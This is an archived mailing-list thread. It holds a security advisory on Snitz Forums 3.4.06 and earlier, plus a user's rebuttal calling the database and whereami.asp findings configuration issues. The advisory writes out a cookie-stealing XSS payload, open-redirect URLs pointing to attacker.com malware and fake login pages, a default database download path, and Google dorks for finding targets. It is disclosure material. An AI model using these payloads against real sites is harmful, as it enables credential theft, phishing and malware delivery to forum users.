Mailing List Archive: [HSC] Snitz Forums Multiple Vulnerabilities

[HSC] Snitz Forums Multiple Vulnerabilities

Snitz Forums Default Database installation allows remote users to download the database which contains critical information. As a result, an attacker exploiting this vulnerability will be able to obtain detailed information. An attacker may leverage xss issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz

Remote: YES
Class: Improper; Instalation configuration, XSS 7 Validation.

Version: 3.4.06 & Previous!
Vendor: http://forum.snitz.com/

* Attackers can exploit these issues via a web client.

- Default Database Disclosure:

/forum/snitz_forums_2000.mdb

Solution:

Change the database name. The name should be a combination of letters and numbers.
That makes it hard for anyone to guess the name of your database.

- Information Leakage: (Version: 3.4.05)

Will show the Database path: /forum/whereami.asp

- Cross-Site Scripting: (all versions)

/Forums/setup.asp?RC=3&MAIL=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

(Versions: 3.4.05 & Below) /login.asp?target=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

- Redirecting weakness/ Phishing Hole:

Forums/login.asp?target=http://attacker.com/virus.exe

Forums/login.asp?target=http://attacker.com/login.asp

Google Dork:

- Powered By: Snitz Forums 2000
- Forum-Setup Page

Only becoming a hacker you can stop a hacker. Were can you learn with out having to pay thousands?- http://kit.hackerscenter.com/ - The most comprehensive security pack you will ever find on the net!

> - Default Database Disclosure:
> /forum/snitz_forums_2000.mdb
> Solution:
> Change the database name. The name should be a combination of
> letters and numbers.
>
> That makes it hard for anyone to guess the name of your database.

As a long time Snitz user who has installed it far more times then one would
consider sane, I question the validity of this advisory. While it is true
that the default database location is insecure, it is very clear in the
readme file that the database should be moved or at the very least renamed:

"Change the database name:
When using an Access database, all the data is stored in a single file,
unlike the other databases. So caution should be taken in where you store
your Access database as it can be downloaded by anyone if they know the
path.
If you store your Access database in a folder outside of your www folder (or
wherever you keep the files for the rest of your site), then you should be
safe because no one can download your database if it is outside of your www
folder.
If you store your database in a cgi-bin folder, or in your www folder, then
it is strongly recommended that you change the default database name from
snitz_forums_2000.mdb to a cryptic or not easy to guess name. The name
should be a combination of letters and numbers. That makes it hard for
anyone to guess the name of your database."
-Quoted from Snitz Forums 2000 README.HTM

The solution in this advisory is the same as mentioned in the README.HTM
setup instructions, and still not a good one compared to moving the file to
a directory not accessible to the public.

> - Information Leakage: (Version: 3.4.05)
> Will show the Database path: /forum/whereami.asp
>

The whereami.asp is not installed by default. It is in a ZIP file that is
optional to extract. And it will only provide the physical location of the
database if the database is in a web accessible area with the whereami.asp
file.

These are configuration issues, not security vulnerabilities.

---
Aaron Cake
Technical Services
Advanced Computer Ideas
Phone: 1-519-433-0279
Fax: 1-519-433-5413